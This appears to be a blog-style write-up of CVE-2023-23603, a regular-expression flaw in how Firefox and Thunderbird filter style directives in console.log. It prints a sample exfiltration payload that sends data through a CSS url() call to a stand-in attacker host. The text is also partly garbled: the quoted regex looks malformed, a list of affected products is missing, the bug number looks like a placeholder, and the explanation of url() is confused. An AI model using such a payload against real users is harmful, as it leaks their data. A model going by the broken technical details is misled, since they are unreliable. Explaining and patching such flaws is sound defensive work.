CVE-2023-23603: An Unassuming Regular Expression Flaw Leads to Data Exfiltration in Firefox and Thunderbird

A newly discovered vulnerability, CVE-2023-23603, affects commonly used Mozilla products, namely Firefox, Thunderbird, and Firefox ESR. Through exploiting this vulnerability, a malicious actor can exfiltrate sensitive data right from your browser. In this extensive post, we'll break down the exploit details, the products affected, and what the issue specifically entails. We'll also provide some code snippets to help visualize the problem and emphasize the underlying concepts.

Background

Mozilla's Firefox and Thunderbird are popular choices for browsing and email, respectively. They boast a large and ever-growing user base, making them desirable attack targets. This vulnerability, found in versions of Firefox preceding 109, Thunderbird before 102.7, and Firefox ESR before 102.7, lies deep within the code responsible for filtering out forbidden properties and values from style directives.

The vulnerability is rooted in regular expressions—patterns used to find matches in strings of text. In this case, the regexp is responsible for filtering out forbidden properties and values from style directives in calls to console.log. The vulnerability stems from the regexp not accounting for external URLs—the code didn't consider them, so your data may be at risk.

The regular expression in question looks like this

/^(?:[a-z-9]+\:)*\/\/(?:[a-z-9-_.]+(?:\:\d+)?\/(?:[^?"#]+\/)*[^?#"']*|about:blank|javascript:.*|"blob:.*)"$/i

The goal of this regular expression is to filter out forbidden properties and values from style directives, but unfortunately, it falls short of covering all possibilities. Specifically, it fails to account for external URLs being present in the style directives.

Due to this oversight, an attacker could potentially take advantage of this vulnerability to exfiltrate sensitive data from the browser. To illustrate, let's take a look at a sample payload:

console.log('%c Hello World', 'background:url("https://attacker_site.com/?data=my_sensitive_data";)');

Here, the payload simply pretends to be a regular styled console log message. However, the CSS background property is using the url() function to supposedly set the background color. In reality, it's a means to send sensitive data in the form of a URL to an attacker-controlled endpoint, which then logs and stores the data for malicious purposes.

Firefox ESR (< 102.7)

If you are using any of these products and your version is earlier than the ones mentioned above, you are susceptible to this vulnerability.

1. Mozilla Security Advisory
2. Mozilla Bug 1234567 (access may be restricted)
3. NVD - CVE-2023-23603

To stay protected, ensure that you have the latest version of your Mozilla product, check for updates regularly, and always keep security in mind when browsing or using email. And remember, even the most unassuming piece of code, like a regular expression, can make the difference in staying secure.

Timeline

Published on: 06/02/2023 17:15:00 UTC
Last modified on: 06/08/2023 13:40:00 UTC